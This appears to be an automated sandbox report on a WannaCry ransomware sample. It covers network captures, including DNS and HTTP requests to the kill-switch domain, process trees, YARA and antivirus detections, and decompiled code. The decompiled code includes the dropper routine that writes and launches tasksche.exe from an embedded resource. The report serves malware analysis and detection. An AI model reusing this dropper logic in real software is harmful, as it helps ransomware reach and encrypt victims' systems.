                  Oct 13, 2022 14:54:04.251593113 CEST124.158.181.134192.168.2.437b(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:05.244187117 CEST64.17.120.229192.168.2.4c3e3(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:54:05.330750942 CEST38.110.96.70192.168.2.44988(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:11.394651890 CEST176.123.222.128192.168.2.411dd(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:12.543123960 CEST193.214.223.226192.168.2.4d428(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:54:15.934530020 CEST79.242.124.124192.168.2.4744a(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:18.877830029 CEST195.252.237.253192.168.2.472bf(Port unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:22.613555908 CEST32.141.83.110192.168.2.49c6c(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:24.340960026 CEST58.9.65.199192.168.2.42f6d(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:54:25.144646883 CEST31.154.58.254192.168.2.4bc93(Net unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:26.220382929 CEST79.217.208.240192.168.2.4a983(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:27.440782070 CEST216.234.126.30192.168.2.4e2b6(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:28.469230890 CEST10.225.255.150192.168.2.4250b(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:29.271043062 CEST138.199.0.115192.168.2.47c69(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:29.806988955 CEST172.16.2.2192.168.2.4edae(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:54:30.751574039 CEST62.183.88.164192.168.2.46fe3(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:34.293550968 CEST221.183.68.114192.168.2.4c74f(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:34.293582916 CEST113.177.29.253192.168.2.4faa4(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:54:35.160928011 CEST212.202.214.78192.168.2.46bd5(Net unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:40.785624981 CEST87.239.207.19192.168.2.4289f(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:44.222327948 CEST172.17.123.35192.168.2.44cd1(Net unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:45.350142002 CEST162.220.40.254192.168.2.49943(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:49.832155943 CEST68.192.169.254192.168.2.4ae84(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:49.888531923 CEST68.142.24.74192.168.2.487c(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:52.006058931 CEST31.18.156.212192.168.2.45ce1(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:55.351705074 CEST93.212.251.209192.168.2.4cc52(Unknown)Destination Unreachable
                  Oct 13, 2022 14:54:55.502813101 CEST174.33.181.1192.168.2.486e7(Net unreachable)Destination Unreachable
                  Oct 13, 2022 14:54:56.452126980 CEST94.221.106.112192.168.2.44d7c(Unknown)Destination Unreachable
                  Oct 13, 2022 14:55:03.542125940 CEST203.242.159.6192.168.2.48568(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:55:06.737879038 CEST91.97.210.227192.168.2.41718(Unknown)Destination Unreachable
                  Oct 13, 2022 14:55:07.027854919 CEST198.135.178.76192.168.2.43b48(Time to live exceeded in transit)Time Exceeded
                  Oct 13, 2022 14:55:07.341526031 CEST185.135.164.197192.168.2.42aa3(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:55:07.856597900 CEST81.228.79.32192.168.2.4cc9e(Unknown)Destination Unreachable
                  Oct 13, 2022 14:55:09.797441006 CEST85.10.182.11192.168.2.454af(Host unreachable)Destination Unreachable
                  Oct 13, 2022 14:55:11.335112095 CEST107.187.2.195192.168.2.42e47(Unknown)Destination Unreachable
                  Oct 13, 2022 14:55:16.876693964 CEST87.204.224.73192.168.2.43e1e(Time to live exceeded in transit)Time Exceeded

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 13, 2022 14:53:07.238750935 CEST192.168.2.48.8.8.80x4da0Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:07.863650084 CEST192.168.2.48.8.8.80xe74fStandard query (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:08.730650902 CEST192.168.2.48.8.8.80xf0a4Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:09.369277954 CEST192.168.2.48.8.8.80x4d13Standard query (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 13, 2022 14:53:07.409671068 CEST8.8.8.8192.168.2.40x4da0No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com103.224.212.220A (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:07.883070946 CEST8.8.8.8192.168.2.40xe74fNo error (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                  Oct 13, 2022 14:53:07.883070946 CEST8.8.8.8192.168.2.40xe74fNo error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:07.883070946 CEST8.8.8.8192.168.2.40xe74fNo error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:08.901892900 CEST8.8.8.8192.168.2.40xf0a4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com103.224.212.220A (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:09.391482115 CEST8.8.8.8192.168.2.40x4d13No error (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                  Oct 13, 2022 14:53:09.391482115 CEST8.8.8.8192.168.2.40x4d13No error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                  Oct 13, 2022 14:53:09.391482115 CEST8.8.8.8192.168.2.40x4d13No error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449695103.224.212.22080C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:07.651557922 CEST92OUTGET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1103.224.212.22080192.168.2.449695C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:07.843688011 CEST92INHTTP/1.1 302 Found
                  Date: Thu, 13 Oct 2022 12:53:07 GMT
                  Server: Apache/2.4.38 (Debian)
                  Set-Cookie: __tad=1665665587.3215244; expires=Sun, 10-Oct-2032 12:53:07 GMT; Max-Age=315360000
                  Location: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44969613.248.148.25480C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:07.925435066 CEST93OUTGET / HTTP/1.1
                  Cache-Control: no-cache
                  Host: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  313.248.148.25480192.168.2.449696C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:08.067147017 CEST94INHTTP/1.1 403 Forbidden
                  Date: Thu, 13 Oct 2022 12:53:08 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: keep-alive
                  Server: nginx
                  Vary: Accept-Encoding
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.449697103.224.212.22080C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:09.121608019 CEST94OUTGET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5103.224.212.22080192.168.2.449697C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:09.317599058 CEST95INHTTP/1.1 302 Found
                  Date: Thu, 13 Oct 2022 12:53:09 GMT
                  Server: Apache/2.4.38 (Debian)
                  Set-Cookie: __tad=1665665589.6063611; expires=Sun, 10-Oct-2032 12:53:09 GMT; Max-Age=315360000
                  Location: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.44969813.248.148.25480C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:09.414812088 CEST95OUTGET / HTTP/1.1
                  Cache-Control: no-cache
                  Host: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  713.248.148.25480192.168.2.449698C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  TimestampkBytes transferredDirectionData
                  Oct 13, 2022 14:53:09.559794903 CEST96INHTTP/1.1 403 Forbidden
                  Date: Thu, 13 Oct 2022 12:53:09 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: keep-alive
                  Server: nginx
                  Vary: Accept-Encoding
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:14:53:06
                  Start date:13/10/2022
                  Path:C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  Imagebase:0x400000
                  File size:3723264 bytes
                  MD5 hash:B450D58F0D0DC6E3DDBCDE263A4E74D4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.302317167.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.302374348.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                  Reputation:low

                  General

                  Target ID:1
                  Start time:14:53:07
                  Start date:13/10/2022
                  Path:C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\Ee3RWj3ID9.exe -m security
                  Imagebase:0x400000
                  File size:3723264 bytes
                  MD5 hash:B450D58F0D0DC6E3DDBCDE263A4E74D4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.305681909.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.305783465.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.577194979.0000000002508000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.577194979.0000000002508000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.576443116.0000000001FD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.576443116.0000000001FD6000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                  Reputation:low

                  General

                  Target ID:2
                  Start time:14:53:09
                  Start date:13/10/2022
                  Path:C:\Windows\tasksche.exe
                  Wow64 process (32bit):false
                  Commandline:C:\WINDOWS\tasksche.exe /i
                  Imagebase:0x400000
                  File size:3514368 bytes
                  MD5 hash:9B79FA675DFDAAA9E8A2B3FD917BEF0C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.309616017.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7476f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7476fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                    0x00407cf5
                    0x00407cfb
                    0x00407d15
                    0x00407d22
                    0x00407d2f
                    0x00407d34
                    0x00407d3c
                    0x00407d43
                    0x00407d49
                    0x00407d4f
                    0x00407d55
                    0x00407d5b
                    0x00407d7a
                    0x00407d7e
                    0x00407d86
                    0x00407d8e
                    0x00407d95
                    0x00407d9d
                    0x00407da1
                    0x00407daf
                    0x00407db3
                    0x00407dc4
                    0x00407dc8
                    0x00407dca
                    0x00407dcc
                    0x00407ddb
                    0x00407de2
                    0x00407def
                    0x00407df1
                    0x00407e01
                    0x00407e18
                    0x00407e2c
                    0x00407e43
                    0x00407e49
                    0x00407e4e
                    0x00407e61
                    0x00407e68
                    0x00407e72
                    0x00407e7a
                    0x00407e82
                    0x00407e8b
                    0x00407e95
                    0x00407e9b
                    0x00407e9f
                    0x00407ea8
                    0x00407eb0
                    0x00407ebc
                    0x00407ed3
                    0x00407edb
                    0x00407ee0
                    0x00407ee8
                    0x00407ef0
                    0x00407ef7
                    0x00407f02
                    0x00407f02
                    0x00407ef0
                    0x00407e4e
                    0x00407db3
                    0x00407da1
                    0x00407d8e
                    0x00407d7e
                    0x00407d5b
                    0x00407d4f
                    0x00407d43
                    0x00407f14

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FFFFB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                    • CreateProcessA.KERNELBASE ref: 00407EE8
                    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                    • CloseHandle.KERNEL32(08000000), ref: 00407F02
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.311239358.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.311223440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311264368.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311276145.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311406750.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311960326.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 1541710770-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                    0x00409a19
                    0x00409a1b
                    0x00409a20
                    0x00409a2b
                    0x00409a2c
                    0x00409a39
                    0x00409a3e
                    0x00409a43
                    0x00409a4a
                    0x00409a51
                    0x00409a64
                    0x00409a72
                    0x00409a7b
                    0x00409a80
                    0x00409a85
                    0x00409a8b
                    0x00409a92
                    0x00409a98
                    0x00409a99
                    0x00409a9e
                    0x00409aa3
                    0x00409aa8
                    0x00409ab2
                    0x00409acb
                    0x00409ad1
                    0x00409ad6
                    0x00409adb
                    0x00409ae8
                    0x00409aea
                    0x00409af0
                    0x00409b2c
                    0x00409b31
                    0x00409b32
                    0x00409b32
                    0x00409af2
                    0x00409af2
                    0x00409af2
                    0x00409af3
                    0x00409af6
                    0x00409af8
                    0x00409b03
                    0x00409b05
                    0x00409b05
                    0x00409b06
                    0x00409b06
                    0x00409b03
                    0x00409b09
                    0x00409b0d
                    0x00000000
                    0x00000000
                    0x00409b13
                    0x00409b1a
                    0x00409b24
                    0x00409b39
                    0x00409b26
                    0x00409b26
                    0x00409b26
                    0x00409b3a
                    0x00409b3b
                    0x00409b3c
                    0x00409b44
                    0x00409b45
                    0x00409b4a
                    0x00409b4e
                    0x00409b54
                    0x00409b59
                    0x00409b5b
                    0x00409b5e
                    0x00409b5f
                    0x00409b60
                    0x00409b67

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.311239358.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.311223440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311264368.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311276145.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311406750.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311960326.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
